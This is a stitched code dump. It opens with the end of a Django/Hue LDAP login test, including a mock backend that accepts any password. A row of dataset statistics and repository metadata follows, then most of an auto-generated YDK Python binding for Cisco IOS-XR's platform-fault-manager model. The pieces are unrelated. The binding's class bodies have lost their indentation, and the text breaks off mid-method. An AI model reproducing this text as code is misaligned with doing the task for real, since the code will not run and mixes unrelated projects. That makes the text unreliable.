    # The lookup doubles as an existence check; get_or_create ensures the group exists.
    User.objects.get(username=self.test_username)
    Group.objects.get_or_create(name=self.test_username)

    credentials = {
        'username': self.test_username,
        'password': "test",
        'login_as': self.test_login_as_username,
    }
    response = self.client.post('/hue/accounts/login/', credentials, follow=True)

    assert_equal(200, response.status_code)
    assert_equal(self.test_login_as_username, response.context[0]['user'].username)
class MockLdapBackend(object):
  """Stand-in for django_auth_ldap's LDAPBackend used by the LDAP login tests.

  It performs no LDAP traffic: authenticate() simply fetches or creates a
  Django user for the supplied username, ignoring the password and server.
  """
  settings = django_auth_ldap_backend.LDAPSettings()

  def get_or_create_user(self, username, ldap_user):
    """Return a (user, created) tuple for `username`; `ldap_user` is unused here.

    Bug fix: get_or_create() takes field lookups as keyword arguments — the
    previous positional call `get_or_create(username)` bound the username to
    the `defaults` parameter instead of filtering by the username field.
    """
    return User.objects.get_or_create(username=username)

  def authenticate(self, username=None, password=None, server=None):
    """Always 'succeed': return the (possibly new) user for `username`."""
    user, created = self.get_or_create_user(username, None)
    return user

  def get_user(self, user_id):
    """Resolve a primary key back to a User, as Django's auth framework requires."""
    return User.objects.get(id=user_id)
| 40.275056 | 167 | 0.723809 | 4,793 | 36,167 | 5.270812 | 0.079491 | 0.057475 | 0.070934 | 0.051459 | 0.827099 | 0.797886 | 0.785813 | 0.770336 | 0.75664 | 0.73669 | 0 | 0.009165 | 0.143252 | 36,167 | 897 | 168 | 40.319955 | 0.806138 | 0.079105 | 0 | 0.743631 | 0 | 0.001592 | 0.165599 | 0.039414 | 0 | 0 | 0 | 0 | 0.214968 | 1 | 0.103503 | false | 0.084395 | 0.039809 | 0.004777 | 0.19586 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
8a8ef57f8e17c09f57f6de260dc58bdb2f612ac5 | 157,030 | py | Python | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_pfm_oper.py | CiscoDevNet/ydk-py | 073731fea50694d0bc6cd8ebf10fec308dcc0aa9 | [
"ECL-2.0",
"Apache-2.0"
] | 177 | 2016-03-15T17:03:51.000Z | 2022-03-18T16:48:44.000Z | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_pfm_oper.py | CiscoDevNet/ydk-py | 073731fea50694d0bc6cd8ebf10fec308dcc0aa9 | [
"ECL-2.0",
"Apache-2.0"
] | 18 | 2016-03-30T10:45:22.000Z | 2020-07-14T16:28:13.000Z | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_pfm_oper.py | CiscoDevNet/ydk-py | 073731fea50694d0bc6cd8ebf10fec308dcc0aa9 | [
"ECL-2.0",
"Apache-2.0"
] | 85 | 2016-03-16T20:38:57.000Z | 2022-02-22T04:26:02.000Z | """ Cisco_IOS_XR_pfm_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR pfm package operational data.
This module contains definitions
for the following management objects\:
platform\-fault\-manager\: PFM data space
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class PlatformFaultManager(_Entity_):
"""
PFM data space
.. attribute:: exclude
Exclude specic hw fault
**type**\: :py:class:`Exclude <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude>`
**config**\: False
.. attribute:: racks
Table of racks
**type**\: :py:class:`Racks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Racks>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    # Auto-generated ydk binding: wire up the top-level container's YANG
    # metadata and instantiate its two child containers (exclude, racks).
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager, self).__init__()
    self._top_entity = None

    self.yang_name = "platform-fault-manager"
    self.yang_parent_name = "Cisco-IOS-XR-pfm-oper"
    self.is_top_level_class = True
    self.has_list_ancestor = False
    self.ylist_key_names = []
    # Maps YANG child names to (python attribute, binding class) pairs.
    self._child_classes = OrderedDict([("exclude", ("exclude", PlatformFaultManager.Exclude)), ("racks", ("racks", PlatformFaultManager.Racks))])
    self._leafs = OrderedDict()  # This container has no leaf nodes of its own.

    self.exclude = PlatformFaultManager.Exclude()
    self.exclude.parent = self
    self._children_name_map["exclude"] = "exclude"

    self.racks = PlatformFaultManager.Racks()
    self.racks.parent = self
    self._children_name_map["racks"] = "racks"
    self._segment_path = lambda: "Cisco-IOS-XR-pfm-oper:platform-fault-manager"
    # Freeze the instance so further attribute writes go through _perform_setattr.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Route attribute writes through ydk's validation / frozen-instance checks.
    self._perform_setattr(PlatformFaultManager, [], name, value)
class Exclude(_Entity_):
"""
Exclude specific hw fault
.. attribute:: fault_type1s
Table of Hardware Failure Device
**type**\: :py:class:`FaultType1s <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up the 'exclude' container: register the fault-type1s child and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude, self).__init__()
    self.yang_name = "exclude"
    self.yang_parent_name = "platform-fault-manager"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("fault-type1s", ("fault_type1s", PlatformFaultManager.Exclude.FaultType1s))])
    self._leafs = OrderedDict()
    self.fault_type1s = PlatformFaultManager.Exclude.FaultType1s()
    self.fault_type1s.parent = self
    self._children_name_map["fault_type1s"] = "fault-type1s"
    self._segment_path = lambda: "exclude"
    self._absolute_path = lambda: "Cisco-IOS-XR-pfm-oper:platform-fault-manager/%s" % self._segment_path()
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the YDK frozen-entity setter."""
    leaf_names = []
    self._perform_setattr(PlatformFaultManager.Exclude, leaf_names, name, value)
class FaultType1s(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: fault_type1
Table of Hardware Failure Device
**type**\: list of :py:class:`FaultType1 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up the 'fault-type1s' list container (YList of FaultType1 entries) and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s, self).__init__()
    self.yang_name = "fault-type1s"
    self.yang_parent_name = "exclude"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("fault-type1", ("fault_type1", PlatformFaultManager.Exclude.FaultType1s.FaultType1))])
    self._leafs = OrderedDict()
    self.fault_type1 = YList(self)  # keyed list of FaultType1 entries
    self._segment_path = lambda: "fault-type1s"
    self._absolute_path = lambda: "Cisco-IOS-XR-pfm-oper:platform-fault-manager/exclude/%s" % self._segment_path()
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the YDK frozen-entity setter."""
    leaf_names = []
    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s, leaf_names, name, value)
class FaultType1(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: hw_fault_type1 (key)
hw fault 1
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: fault_type2s
Table of Hardware Failure Device
**type**\: :py:class:`FaultType2s <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s>`
**config**\: False
.. attribute:: racks
Table of racks
**type**\: :py:class:`Racks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up a 'fault-type1' list entry keyed by hw_fault_type1 and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1, self).__init__()
    self.yang_name = "fault-type1"
    self.yang_parent_name = "fault-type1s"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = ['hw_fault_type1']
    self._child_classes = OrderedDict([("fault-type2s", ("fault_type2s", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s)), ("racks", ("racks", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks))])
    self._leafs = OrderedDict([
        ('hw_fault_type1', (YLeaf(YType.str, 'hw-fault-type1'), ['str'])),
    ])
    self.hw_fault_type1 = None  # list key leaf
    self.fault_type2s = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s()
    self.fault_type2s.parent = self
    self._children_name_map["fault_type2s"] = "fault-type2s"
    self.racks = PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks()
    self.racks.parent = self
    self._children_name_map["racks"] = "racks"
    # Segment path embeds the key value; evaluated lazily via lambda.
    self._segment_path = lambda: "fault-type1" + "[hw-fault-type1='" + str(self.hw_fault_type1) + "']"
    self._absolute_path = lambda: "Cisco-IOS-XR-pfm-oper:platform-fault-manager/exclude/fault-type1s/%s" % self._segment_path()
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes (key leaf included) through the YDK setter."""
    keyed_leafs = ['hw_fault_type1']
    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1, keyed_leafs, name, value)
class FaultType2s(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: fault_type2
Table of Hardware Failure Device
**type**\: list of :py:class:`FaultType2 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up the 'fault-type2s' list container (YList of FaultType2 entries) and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s, self).__init__()
    self.yang_name = "fault-type2s"
    self.yang_parent_name = "fault-type1"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("fault-type2", ("fault_type2", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2))])
    self._leafs = OrderedDict()
    self.fault_type2 = YList(self)  # keyed list of FaultType2 entries
    self._segment_path = lambda: "fault-type2s"
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the YDK frozen-entity setter."""
    leaf_names = []
    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s, leaf_names, name, value)
class FaultType2(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: hw_fault_type2 (key)
hw fault 2
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: fault_type3s
Table of Hardware Failure Device
**type**\: :py:class:`FaultType3s <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s>`
**config**\: False
.. attribute:: racks
Table of racks
**type**\: :py:class:`Racks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up a 'fault-type2' list entry keyed by hw_fault_type2 and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2, self).__init__()
    self.yang_name = "fault-type2"
    self.yang_parent_name = "fault-type2s"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['hw_fault_type2']
    self._child_classes = OrderedDict([("fault-type3s", ("fault_type3s", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s)), ("racks", ("racks", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks))])
    self._leafs = OrderedDict([
        ('hw_fault_type2', (YLeaf(YType.str, 'hw-fault-type2'), ['str'])),
    ])
    self.hw_fault_type2 = None  # list key leaf
    self.fault_type3s = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s()
    self.fault_type3s.parent = self
    self._children_name_map["fault_type3s"] = "fault-type3s"
    self.racks = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks()
    self.racks.parent = self
    self._children_name_map["racks"] = "racks"
    # Segment path embeds the key value; evaluated lazily via lambda.
    self._segment_path = lambda: "fault-type2" + "[hw-fault-type2='" + str(self.hw_fault_type2) + "']"
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes (key leaf included) through the YDK setter."""
    keyed_leafs = ['hw_fault_type2']
    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2, keyed_leafs, name, value)
class FaultType3s(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: fault_type3
Table of Hardware Failure Device
**type**\: list of :py:class:`FaultType3 <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up the 'fault-type3s' list container (YList of FaultType3 entries) and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s, self).__init__()
    self.yang_name = "fault-type3s"
    self.yang_parent_name = "fault-type2"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("fault-type3", ("fault_type3", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3))])
    self._leafs = OrderedDict()
    self.fault_type3 = YList(self)  # keyed list of FaultType3 entries
    self._segment_path = lambda: "fault-type3s"
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the YDK frozen-entity setter."""
    leaf_names = []
    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s, leaf_names, name, value)
class FaultType3(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: hw_fault_type3 (key)
hw fault 3
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: racks
Table of racks
**type**\: :py:class:`Racks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up a 'fault-type3' list entry keyed by hw_fault_type3 and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3, self).__init__()
    self.yang_name = "fault-type3"
    self.yang_parent_name = "fault-type3s"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['hw_fault_type3']
    self._child_classes = OrderedDict([("racks", ("racks", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks))])
    self._leafs = OrderedDict([
        ('hw_fault_type3', (YLeaf(YType.str, 'hw-fault-type3'), ['str'])),
    ])
    self.hw_fault_type3 = None  # list key leaf
    self.racks = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks()
    self.racks.parent = self
    self._children_name_map["racks"] = "racks"
    # Segment path embeds the key value; evaluated lazily via lambda.
    self._segment_path = lambda: "fault-type3" + "[hw-fault-type3='" + str(self.hw_fault_type3) + "']"
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes (key leaf included) through the YDK setter."""
    keyed_leafs = ['hw_fault_type3']
    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3, keyed_leafs, name, value)
class Racks(_Entity_):
"""
Table of racks
.. attribute:: rack
Number
**type**\: list of :py:class:`Rack <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up the 'racks' list container (YList of Rack entries) and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks, self).__init__()
    self.yang_name = "racks"
    self.yang_parent_name = "fault-type3"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("rack", ("rack", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack))])
    self._leafs = OrderedDict()
    self.rack = YList(self)  # keyed list of Rack entries
    self._segment_path = lambda: "racks"
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the YDK frozen-entity setter."""
    leaf_names = []
    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks, leaf_names, name, value)
class Rack(_Entity_):
"""
Number
.. attribute:: rack (key)
Rack number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: slots
Table of slots
**type**\: :py:class:`Slots <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up a 'rack' list entry keyed by the uint32 rack number and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack, self).__init__()
    self.yang_name = "rack"
    self.yang_parent_name = "racks"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['rack']
    self._child_classes = OrderedDict([("slots", ("slots", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots))])
    self._leafs = OrderedDict([
        ('rack', (YLeaf(YType.uint32, 'rack'), ['int'])),
    ])
    self.rack = None  # list key leaf (rack number)
    self.slots = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots()
    self.slots.parent = self
    self._children_name_map["slots"] = "slots"
    # Segment path embeds the key value; evaluated lazily via lambda.
    self._segment_path = lambda: "rack" + "[rack='" + str(self.rack) + "']"
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes (key leaf included) through the YDK setter."""
    keyed_leafs = ['rack']
    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack, keyed_leafs, name, value)
class Slots(_Entity_):
"""
Table of slots
.. attribute:: slot
Name
**type**\: list of :py:class:`Slot <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up the 'slots' list container (YList of Slot entries) and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots, self).__init__()
    self.yang_name = "slots"
    self.yang_parent_name = "rack"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("slot", ("slot", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot))])
    self._leafs = OrderedDict()
    self.slot = YList(self)  # keyed list of Slot entries
    self._segment_path = lambda: "slots"
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the YDK frozen-entity setter."""
    leaf_names = []
    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots, leaf_names, name, value)
class Slot(_Entity_):
"""
Name
.. attribute:: slot (key)
Slot name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: fault_summary
Table of Hardware Summary
**type**\: :py:class:`FaultSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.FaultSummary>`
**config**\: False
.. attribute:: hardware_fault_devices
Table of Hardware Failure
**type**\: :py:class:`HardwareFaultDevices <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up a 'slot' list entry keyed by slot name; wires fault-summary and hardware-fault-devices children, then freezes."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot, self).__init__()
    self.yang_name = "slot"
    self.yang_parent_name = "slots"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['slot']
    self._child_classes = OrderedDict([("fault-summary", ("fault_summary", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.FaultSummary)), ("hardware-fault-devices", ("hardware_fault_devices", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices))])
    self._leafs = OrderedDict([
        ('slot', (YLeaf(YType.str, 'slot'), ['str'])),
    ])
    self.slot = None  # list key leaf (slot name)
    self.fault_summary = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.FaultSummary()
    self.fault_summary.parent = self
    self._children_name_map["fault_summary"] = "fault-summary"
    self.hardware_fault_devices = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices()
    self.hardware_fault_devices.parent = self
    self._children_name_map["hardware_fault_devices"] = "hardware-fault-devices"
    # Segment path embeds the key value; evaluated lazily via lambda.
    self._segment_path = lambda: "slot" + "[slot='" + str(self.slot) + "']"
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes (key leaf included) through the YDK setter."""
    keyed_leafs = ['slot']
    self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot, keyed_leafs, name, value)
class FaultSummary(_Entity_):
    """
    Table of Hardware Summary
    .. attribute:: severity_critical_count
    Fault Severity Critical count
    **type**\: int
    **range:** \-2147483648..2147483647
    **config**\: False
    .. attribute:: severity_emergency_or_alert_count
    Fault Severity Emergency count
    **type**\: int
    **range:** \-2147483648..2147483647
    **config**\: False
    .. attribute:: total
    Faulty Hardware total count
    **type**\: int
    **range:** \-2147483648..2147483647
    **config**\: False
    .. attribute:: severity_error_count
    Fault Severity Error count
    **type**\: int
    **range:** \-2147483648..2147483647
    **config**\: False
    """
    _prefix = 'pfm-oper'
    _revision = '2017-03-28'
    def __init__(self):
        """Set up the leaf-only 'fault-summary' container and freeze."""
        # Python 2/3 compatible super() call.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.FaultSummary, self).__init__()
        self.yang_name = "fault-summary"
        self.yang_parent_name = "slot"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container, no children
        self._leafs = OrderedDict([
            ('severity_critical_count', (YLeaf(YType.int32, 'severity-critical-count'), ['int'])),
            ('severity_emergency_or_alert_count', (YLeaf(YType.int32, 'severity-emergency-or-alert-count'), ['int'])),
            ('total', (YLeaf(YType.int32, 'total'), ['int'])),
            ('severity_error_count', (YLeaf(YType.int32, 'severity-error-count'), ['int'])),
        ])
        self.severity_critical_count = None
        self.severity_emergency_or_alert_count = None
        self.total = None
        self.severity_error_count = None
        self._segment_path = lambda: "fault-summary"
        # Freeze last: all assignments above must precede this flag.
        self._is_frozen = True
    def __setattr__(self, name, value):
        """Route attribute writes through the YDK frozen-entity setter."""
        self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.FaultSummary, ['severity_critical_count', 'severity_emergency_or_alert_count', 'total', 'severity_error_count'], name, value)
    @staticmethod
    def _meta_info():
        """Return the generated meta-info record for this class."""
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
        return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.FaultSummary']['meta_info']
class HardwareFaultDevices(_Entity_):
"""
Table of Hardware Failure
.. attribute:: hardware_fault_device
Table of Hardware Failure Device
**type**\: list of :py:class:`HardwareFaultDevice <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
    """Set up the 'hardware-fault-devices' list container and freeze."""
    # Python 2/3 compatible super() call.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices, self).__init__()
    self.yang_name = "hardware-fault-devices"
    self.yang_parent_name = "slot"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("hardware-fault-device", ("hardware_fault_device", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice))])
    self._leafs = OrderedDict()
    self.hardware_fault_device = YList(self)  # keyed list of HardwareFaultDevice entries
    self._segment_path = lambda: "hardware-fault-devices"
    # Freeze last: all assignments above must precede this flag.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Route attribute writes through the YDK frozen-entity setter."""
    leaf_names = []
